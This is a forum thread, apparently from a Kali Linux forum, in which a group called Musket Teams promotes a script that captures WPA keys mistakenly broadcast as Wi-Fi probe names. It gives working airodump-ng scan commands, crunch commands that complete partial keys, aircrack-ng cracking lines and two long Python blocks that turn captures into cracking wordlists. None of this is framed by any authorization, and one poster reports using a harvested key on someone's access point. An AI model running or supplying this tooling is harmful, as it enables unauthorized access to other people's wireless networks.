
Thread: Finding WPA Keys Broadcast In Clear

  1. #1
    Join Date
    2013-Jul
    Posts
    819

    Finding WPA Keys Broadcast In Clear

    ESSIDPROBEWPA3-21.sh has been released for general use.

    The bug that appeared when it was used with Kali 2.0 and the newer versions of aircrack-ng has been corrected.

    Additions:

    When the C programmer associated with MTeams found ESSID probes that were incomplete WPA key strings, e.g. 7 characters in length, an extensive rewrite of this program resulted. To find the missing characters, crunch is used to fill in the blanks as follows:

    Menu-based crunch modules have been included to allow the user to expand ESSID probes, using the ESSID probe strings as the base words, to find any missing characters.

    Specific words can be randomized through menu-driven selections by the user.

    Random characters can be crunch character groups like [0123456789] or specific selected characters like 12Dc, just as examples.

    This program can produce large files, so care should be used if it is employed on operating systems with small amounts of storage space, such as persistent USB installs of Kali 2.0.

    To see how the program functions, try writing only one (1) character or a specific text string and play with the selections before you make large files based on crunch character groups or large ESSID probe text files.

    Users should feel free to suggest other crunch permutations to be included. They will be added if possible in later versions. If you find any bugs, please advise.

    You can download here with kali or at:

    http://www.datafilehost.com/d/3fb327e4


    Overview

    The most sophisticated ciphers are many times defeated by simple operator error. The German Army High Command(OKW) used enigma in WWII to encrypt messages. The cipher was finally broken when a radio operator sent the same message twice without changing the key settings.

    Wi-Fi managing systems are also prone to operator errors. Musket Teams began seeing WPA keys broadcast in clear text, paired with the ESSID name, when running airodump-ng. MTeams knew the data pair sent was the WPA key and the station, as the code had previously been broken through other means such as Reaver or brute force. It soon became apparent that two (2) events were occurring. The wifi user was loading the WPA key into the ESSID (AP name) field of the wifi managing software, and the software began probing for a station using the WPA key as the ESSID (AP name). Later, when the connection did not work, the user corrected the error by setting up a new connection and leaving the old connection in place. The software then probed the BSSID using both the WPA key and the ESSID.

    In airodump-ng you might see something like this at the bottom:

    BSSID              STATION            PROBE
    55:44:33:22:11:00  00:11:22:33:44:55  12345678,Wifi_Home

    or

    BSSID              STATION            PROBE
    55:44:33:22:11:00  00:11:22:33:44:55  12345678

    Using the screen to collect this data is not practical. The best way is to access the two (2) .csv files made by airodump-ng when using -w filename (write a dump file) on the airodump-ng command line. Musket Teams then wrote a small program to strip the kismet.csv file and the .csv file of the relevant data. The script has a commented help file embedded at the top. It gives you a text file suitable for aircrack-ng, pyrit and Elcomsoft, and it produces two (2) reference files to help determine ESSID, BSSID, PROBE pairing. This wordlist file has other uses. Sometimes the user loads the ESSID name into the WPA key field, hence the WPA key is the AP name. This cannot be determined from the scan, BUT the wordlist has all the ESSIDs seen, therefore it can quickly determine whether the WPA key is the ESSID when run against a handshake using aircrack-ng, pyrit or Elcomsoft.

    For example:

    aircrack-ng wifi.cap -w essidprobesdic.txt

    Musket Teams
    Last edited by mmusket33; 2016-01-11 at 03:26.
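The post above describes stripping the airodump-ng .csv output down to a wordlist plus ESSID/BSSID/probe reference data. The following is an added example of that extraction, written for this page; it is not the ESSIDPROBEWPA script and does not reproduce it. It assumes the column layout the airodump-ng CSV writer used in aircrack-ng 1.2 (an AP table followed by a station table whose trailing fields are the probed ESSIDs), and the sample capture text is constructed, not a real scan. The function names (parse_airodump_csv, build_wordlist, pairing_report, flag_key_candidates) are this example's own.

```python
import csv
import io

# Constructed sample of an airodump-ng "<prefix>-01.csv" file (not a real capture).
# Layout as written by aircrack-ng 1.2: AP table, blank line, station table whose
# trailing fields are the probed ESSIDs. Newer versions may add columns; only the
# ones read below matter.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
66:44:33:22:11:00, 2015-09-28 07:20:00, 2015-09-28 07:20:08,  6,  54, WPA, CCMP, PSK, -66,  2,  7,   0.  0.  0.  0,  11, Wifi Name 1, 
77:44:33:22:11:00, 2015-09-28 07:20:00, 2015-09-28 07:20:08,  7,  54, WPA2, CCMP, PSK, -72,  2,  0,   0.  0.  0.  0,  11, Wifi Name 2, 
88:44:33:22:11:00, 2015-09-28 07:20:00, 2015-09-28 07:20:08,  5,  54, WPA2, CCMP, PSK, -73, 14,  0,   0.  0.  0.  0,   4, Home, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2015-09-28 07:20:01, 2015-09-28 07:20:07, -57,  5, 66:44:33:22:11:00, 12345678,Wifi Name 1
00:11:22:33:44:77, 2015-09-28 07:20:03, 2015-09-28 07:20:05, -72,  1, (not associated) ,033441345
00:11:22:33:44:99, 2015-09-28 07:20:03, 2015-09-28 07:20:05, -73,  1, (not associated) ,Wifi Name 4
"""


def parse_airodump_csv(text):
    """Return ({bssid: essid}, [station dicts]) from airodump-ng's -w <prefix>-01.csv.

    Sections are recognised by their header row. skipinitialspace absorbs the
    ", " padding airodump writes after every delimiter. An ESSID that itself
    contains a comma shifts the AP columns; this reader does not try to recover it.
    """
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue                                    # blank separator line
        first = row[0].strip()
        if first == "BSSID":
            section = "ap"
            continue
        if first == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps[first] = row[13].strip()
        elif section == "sta" and len(row) >= 6:
            bssid = row[5].strip()
            stations.append({
                "station": first,
                "bssid": None if bssid == "(not associated)" else bssid,
                # every field after the BSSID column is one probed ESSID
                "probes": [p.strip() for p in row[6:] if p.strip()],
            })
    return aps, stations


def psk_length_ok(word):
    """WPA/WPA2 passphrases are 8..63 bytes; aircrack-ng skips anything else."""
    return 8 <= len(word.encode("utf-8")) <= 63


def build_wordlist(aps, stations):
    """Every ESSID seen plus every probe string, deduplicated and sorted.
    Short ESSIDs are kept on purpose: the list is also used to test whether an
    AP's key is its own name, and the cracker filters by length anyway."""
    words = set(aps.values())
    for sta in stations:
        words.update(sta["probes"])
    words.discard("")
    return sorted(words)


def pairing_report(aps, stations):
    """(station, bssid, essid of that bssid, probe) rows for the reference file."""
    rows = []
    for sta in stations:
        essid = aps.get(sta["bssid"]) if sta["bssid"] else None
        for probe in sta["probes"] or [""]:
            rows.append((sta["station"], sta["bssid"] or "(not associated)", essid, probe))
    return rows


def flag_key_candidates(aps, stations):
    """Coarse triage: probes that match no ESSID advertised in the capture and
    have a valid passphrase length. All-digit strings come first, following the
    thread's rule of thumb that most PSKs are 8-10 digit numbers."""
    advertised = set(aps.values())
    cands = {p for sta in stations for p in sta["probes"]
             if p not in advertised and psk_length_ok(p)}
    return sorted(cands, key=lambda w: (not w.isdigit(), w))


def write_wordlist(path, words):
    """One word per line, LF only, so the same file works for aircrack-ng and pyrit."""
    with open(path, "w", encoding="utf-8", newline="\n") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    write_wordlist("essidprobesdic.txt", build_wordlist(aps, stations))
    for row in pairing_report(aps, stations):
        print("%-17s  %-17s  %-12s  %s" % tuple(x or "" for x in row))
    print("try first:", flag_key_candidates(aps, stations))
```

To run it on a real scan, replace SAMPLE_CSV with the contents of your `<prefix>-01.csv` and feed the written wordlist to `aircrack-ng <capture>.cap -w essidprobesdic.txt`. The triage list is a hint, not proof: a probe for an AP that was simply out of range while you scanned will also be flagged.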

  2. #2
    Join Date
    2013-Jul
    Posts
    819
    ESSIDPROBEWPA1-2.sh has been withdrawn.

    You can download

    ESSIDPROBEWPA1-4.sh at

    http://www.datafilehost.com/d/083a4c11


    MTeams

  3. #3
    Join Date
    2015-Mar
    Posts
    2
    @mmusket thanks for your tool. Hi, I have tried to test this script but it always asks for the .csv file; I have it already in root. But the script tells me the file is not there!
    Why?

    I have dumpfile-01.csv and dumpfile-01.kismet.csv in root .

  4. #4
    Join Date
    2013-Jul
    Posts
    819
    To Sherubin

    We downloaded the program from datafilehost and loaded it on three (3) different computers, and the program ran fine. All computers were running kali-linux 1.09a, fully updated and upgraded.

    MTeams then tried to simulate the failure. We induced your failure when the program was run from a folder off root, so just place this program in root and run it as follows: ./ESSIDPROBEWPA1-4.sh

    We will be issuing ESSIDPROBEWPA1-5.sh as soon as we are satisfied with the testing. The changes have to do with making the essidprobesdic.txt file DOS-friendly and removing the duplicates that still remain. Look back here in a few days if you are interested.

    Write us again if this has not solved your problem and we will retest again.

    MTeams
    Last edited by mmusket33; 2015-03-03 at 11:07.

  5. #5
    Join Date
    2015-Mar
    Posts
    2
    Yes, thanks musket33, it runs fine from root.

  6. #6
    Join Date
    2013-Jul
    Posts
    819
    MTeams has updated to ESSIDPROBEWPA1-5.sh

    This version corrects some duplicate problems and makes the dic file easier to use with aircrack-ng and Elcomsoft.

    You can download the newer version at:

    http://www.datafilehost.com/d/c161a915

  7. #7
    Join Date
    2013-Jul
    Posts
    819
    WPA Key Fragments Broadcast In Clear Text


    WPA keys in clear text have taken another turn. Our Musket Team C programmer has found cases where WPA key fragments (i.e. incomplete keys) are being broadcast in clear text. In this case the wifi user is inputting an incomplete WPA key in the ESSID field of the wifi software. When the key does not work, the user makes another connection and does not remove the older version. The wifi device then probes using both the WPA key fragment and the ESSID name.

    These key fragments are easy to discover if they are less than 8 characters in length. However, incomplete keys greater than 7 are more difficult to handle.

    A rule of thumb in WPA brute force cracking is that 50% of the keys chosen by users are numeric strings 8 to 10 characters in length, and more than half of these numeric-only keys are local telephone numbers.

    You might see something like this in the airodump-ng probes:

    1234567, Wifi Home

    Hence ESSID probes shorter than 8 characters in length that appear to be key fragments might be attacked as follows.

    Most WPA keys are numeric only, 8 to 10 characters in length. If you have Elcomsoft and Windows, use the word attack and check combinations of the string. If not, make a series of dictionary files and test them against a handshake.


    For example, if you see 1234567, Wifi Home in your probes, run crunch.

    A simple approach here would be (crunch's -t pattern must be the same length as the min/max arguments, and each @ is filled from the charset given):

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@ -o File88-01

    crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@@ -o File99-01

    crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@@@ -o File1010-01

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t @1234567 -o File88-02

    crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t @@1234567 -o File99-02

    crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" -t @@@1234567 -o File1010-02


    A more complicated approach would be to work through ALL the positions, making small dictionaries:


    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@234567 -o File88c-01

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12@34567 -o File88c-02

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123@4567 -o File88c-03

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234@567 -o File88c-04

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12345@67 -o File88c-05

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123456@7 -o File88c-06


    crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@2345678 -o File99c-06

    etc etc etc

    All variations are not shown here


    Keys 8 or more in length that do not successfully crack the key through tools like aircrack-ng might be WPA key fragments. In such a case the more complicated approach must be employed.

    There is a significant social engineering component in successfully brute forcing a WPA key. Even if your computer's cracking speed is slow, running numeric keys 8 to 10 characters in length against a WPA handshake is possible. If you are given a part of the key, the chances of cracking the WPA key increase.

    MTeams are working on an expansion of ESSIDPROBE1-5 to construct these dictionaries automatically. In the meantime, if you discover these WPA fragments in clear text you can try the simple approach above; you might just get lucky.

    Musket Teams
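The crunch lines above cover one wildcard layout per command and the post only hints at the full set of positions. The following is an added example, written for this page and not part of the ESSIDPROBEWPA script, that generates the same candidate sets in Python: the "simple approach" (missing characters all before or all after the fragment), the "complicated approach" generalised to any placement of the missing characters (including split across several gaps), a count of the lines crunch would write so you can judge the file size before running it, and a wordlist ordered digits-first per the rule of thumb in the post. Function names and the default charsets are this example's own assumptions.

```python
import itertools
from math import comb

DIGITS = "0123456789"
LOWER_ALNUM = DIGITS + "abcdefghijklmnopqrstuvwxyz"   # same charset as the crunch lines


def expand_ends(fragment, length, charset=DIGITS):
    """Simple approach: the missing characters sit entirely before or entirely
    after the fragment (crunch -t @@1234567 and crunch -t 1234567@@)."""
    k = length - len(fragment)
    if k < 0:
        return set()
    out = set()
    for fill in itertools.product(charset, repeat=k):
        pad = "".join(fill)
        out.add(pad + fragment)
        out.add(fragment + pad)
    return out


def expand_all_positions(fragment, length, charset=DIGITS):
    """Complicated approach: the k missing characters may sit at any positions,
    including split across several gaps. This is the union of every crunch -t
    pattern that keeps the fragment's characters in order; strings that several
    patterns produce (1@234567 and 12@34567 both give 12234567 for '2') are
    kept once."""
    k = length - len(fragment)
    if k < 0:
        return set()
    out = set()
    for slots in itertools.combinations(range(length), k):   # where the @s go
        for fill in itertools.product(charset, repeat=k):
            fill_it, frag_it = iter(fill), iter(fragment)
            out.add("".join(next(fill_it) if i in slots else next(frag_it)
                            for i in range(length)))
    return out


def raw_count(fragment, length, charset=LOWER_ALNUM, mode="ends"):
    """Lines crunch would write before deduplication; check this before -o."""
    k = length - len(fragment)
    if k <= 0:
        return 1 if k == 0 else 0
    patterns = 2 if mode == "ends" else comb(length, k)
    return patterns * len(charset) ** k


def fragment_wordlist(fragment, lengths=(8, 9, 10), mode="ends"):
    """Candidates for every target length, digits-only guesses first (the
    numeric-PSK rule of thumb), then lowercase alphanumerics, no repeats."""
    expand = expand_ends if mode == "ends" else expand_all_positions
    seen, out = set(), []
    for charset in (DIGITS, LOWER_ALNUM):
        for length in lengths:
            for word in sorted(expand(fragment, length, charset)):
                if word not in seen:
                    seen.add(word)
                    out.append(word)
    return out


if __name__ == "__main__":
    frag = "1234567"
    print("ends, length 8, digits:", len(expand_ends(frag, 8)))
    print("all positions, length 8, digits:", len(expand_all_positions(frag, 8)))
    print("crunch lines, all positions, length 10, alnum:",
          raw_count(frag, 10, LOWER_ALNUM, "all"))
    with open("fragment-%s.txt" % frag, "w") as fh:
        fh.write("\n".join(fragment_wordlist(frag, (8, 9, 10), "ends")) + "\n")
```

The size check matters: for a 7-character fragment padded to 10 over the 36-character charset, the all-positions approach is 120 patterns of 46656 lines each, which is why the post recommends small per-position dictionaries rather than one file. Feed the written file to `aircrack-ng <capture>.cap -w fragment-1234567.txt`.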

  8. #8
    Join Date
    2013-Jul
    Posts
    819
    MTeams run constant airodump-ng scans listening for both WPA handshakes and WPA keys broadcast in clear text.

    airodump-ng -w scanwifi mon0

    We also get e-mails saying clear text WPA keys cannot occur. Here is a typical example received within the last 24 hours. All ESSID, BSSID info and the WPA key have been sterilized. The WPA key broadcast in clear text is 033441345.

    CH  5 ][ Elapsed: 8 s ][ 2015-09-28 07:20

    BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

    55:44:33:22:11:00   -1    0        0      5    0   5  -1   WEP   WEP           <length: 0>
    66:44:33:22:11:00  -66    0        2      7    1   6  54e  WPA   CCMP    PSK   Wifi Name 1
    77:44:33:22:11:00  -72    0        2      0    0   7  54e  WPA2  CCMP    PSK   Wifi Name 2
    88:44:33:22:11:00  -73   19       14      0    0   5  54e. WPA2  CCMP    PSK   Wifi Name 3

    BSSID              STATION            PWR   Rate    Lost  Frames  Probe

    55:44:66:00:22:33  00:11:22:33:55:77  -57   0 - 1    148       5
    (not associated)   00:11:22:33:44:99  -73   0 - 1      0       1  Wifi Name 4
    (not associated)   00:11:22:33:44:77  -72   0 - 1      0       1  033441345
    (not associated)   00:11:22:33:55:55  -64   0 - 1      0       1
    (not associated)   00:11:22:33:55:55  -75   0 - 1      0       2
    55:44:33:22:11:00  00:11:22:33:44:55   -1   1e- 0      0       2
    66:44:33:22:11:00  00:11:22:33:44:66  -51   0 - 1e    43       5


    You can quickly check for handshakes by running

    wpaclean scanwifi-01a.cap scanwifi-01.cap

    where:

    scanwifi-01a.cap is the cleaned (output) file

    scanwifi-01.cap is the original capture


    This will give a list of WPA handshakes on the screen and can be run at any time, even while airodump-ng is collecting data.

    MTeams
    Last edited by mmusket33; 2015-09-28 at 01:21.

  9. #9
    It looks very good. Thanks for sharing.
    Last edited by basto; 2015-09-29 at 06:33.

  10. #10
    Join Date
    2013-Mar
    Location
    Root
    Posts
    13
    This happened to me. I was scanning away when I noticed what looked like a WPA key in the probe column, so I tested it on the AP and it worked.
    Never seen this before; any idea why it was shown? I have been scanning again and it was not shown the second time.

    The only reason that you fail is because you quit....

  11. #11
    Join Date
    2013-Jul
    Posts
    819
    To zerocool

    MTeams are constantly learning field craft. We see these probes all the time, but you have to know what to look for. In fact we saw one this morning.

    With airodump-ng, what is kept on the screen for viewing is only 120 sec unless you add --berlin 1000000 to the command line. Also add --beacons to increase the number of beacons stored. See airodump-ng --help.

    Example:

    airodump-ng --berlin 1000000 --beacons -w dumpfile mon0

    After you capture this data, run it through our ESSIDPROBEWPA.sh

    Note MTeams will add these commands to the airodump-ng command lines when we update handshakeharvest2-5.sh

    Musket Teams
    Last edited by mmusket33; 2015-10-30 at 03:17.

  12. #12
    Join Date
    2015-Oct
    Posts
    8
    I've been looking at these 'Probe' characters since I started with pentesting (2 weeks back).
    In fact, initially I did a web search for probe stations to figure out what they actually are/were, but no info or TMI.

    Once again, thanks MTeams for pointing this out; I will keep an eye out for these things.
    Is this script Kali 2.0 compatible?

  13. #13
    Join Date
    2013-Mar
    Location
    Root
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    To zerocool

    MTeams are constantly learning field craft. We see these probes all the time, but you have to know what to look for. In fact we saw one this morning.

    With airodump-ng, what is kept on the screen for viewing is only 120 sec unless you add --berlin 1000000 to the command line. Also add --beacons to increase the number of beacons stored. See airodump-ng --help.

    Example:

    airodump-ng --berlin 1000000 --beacons -w dumpfile mon0

    After you capture this data, run it through our ESSIDPROBEWPA.sh

    Note MTeams will add these commands to the airodump-ng command lines when we update handshakeharvest2-5.sh

    Musket Teams
    I have tried to do what you said, but both text files are empty. What am I doing wrong?

    Does this look correct to you?
    Last edited by zerocool; 2015-11-02 at 09:59. Reason: added screenshot

  14. #14
    Join Date
    2013-Jul
    Posts
    819
    To zerocool

    Thanks for pointing this out.

    We ran some tests with Kali 1.1 and it ran fine, so we cranked up Kali 2.0 and it did not run. We traced the error to the airodump-ng csv output, which looks like it has changed slightly, causing one of the awk lines to fail.

    We do not have a lot of .csv files captured through K2.0 to test this, so we will capture a big block of data and rewrite the program to fit the newer airodump-ng output.

    Again Thanks!!!

    MTeams
    Last edited by mmusket33; 2015-11-02 at 13:03.

  15. #15
    Join Date
    2015-May
    Posts
    18
    I got a strange probe.

    probe.jpg

    It seems that not only the SSID and WPA key can be found, but also the local IP XD

  16. #16
    Join Date
    2013-Mar
    Location
    Root
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    To zerocool

    Thanks for pointing this out.

    We ran some tests with Kali 1.1 and it ran fine, so we cranked up Kali 2.0 and it did not run. We traced the error to the airodump-ng csv output, which looks like it has changed slightly, causing one of the awk lines to fail.

    We do not have a lot of .csv files captured through K2.0 to test this, so we will capture a big block of data and rewrite the program to fit the newer airodump-ng output.

    Again Thanks!!!

    MTeams
    Any ETA on this? While we wait, isn't there a command or another way to output any keys found in the dumpfile?

  17. #17
    Join Date
    2013-Jul
    Posts
    819
    To zerocool

    There are no tools for this as far as we know. This approach was not even recognized.

    To do this manually will take time if you have a lot of .csv data. You could open up each .csv file collected by airodump-ng and look for any text strings that look like a WPA key. And then there is the fact that users may load the AP name into the WPA key field, so the WPA key and the ESSID are the same.
    MTeams has stopped all other projects to correct this, as any of our lab programs that run airodump-ng also collect data on the side and then send it to a text file for brute force work. The program is running; we are just adding modules to handle cases where the user inputs the WPA key incorrectly and the length is less than 8. I would think within three to five days, unless the waves become rideable.

    MTeams

  18. #18
    Join Date
    2013-Jul
    Posts
    819
    ESSIDPROBEWPA3-21.sh has been released for general use.

    See start of thread for version commentary.

    You can download at:

    http://www.datafilehost.com/d/3fb327e4

    MTeams
    Last edited by mmusket33; 2016-01-11 at 02:52.

  19. #19
    Join Date
    2013-Jul
    Posts
    819
    Those working with csv files may find the following script useful, see:


    http://forum.aircrack-ng.org/index.php/topic,898.0.html


    Musket Teams

  20. #20
    Join Date
    2013-May
    Posts
    1
    nice work thanks to MTeams

  21. #21
    Join Date
    2016-Aug
    Posts
    1
    Thank you for the info and for sharing it!

  22. #22
    Join Date
    2013-Jul
    Posts
    819
    To KabelHorst and Maculo:


    May the password be with you

    Musket Teams

  23. #23
    Join Date
    2013-Jul
    Posts
    819
    Chris has issued an update to his csv program.

    See https://forum.aircrack-ng.org/index....pic,898.0.html

    Musket Teams

  24. #24
    Join Date
    2017-Jan
    Posts
    65
    Quote Originally Posted by mmusket33 View Post
    Chris has issued an update to his csv program.
    v0.5 now: https://forum.aircrack-ng.org/index....ebvn86#msg4550
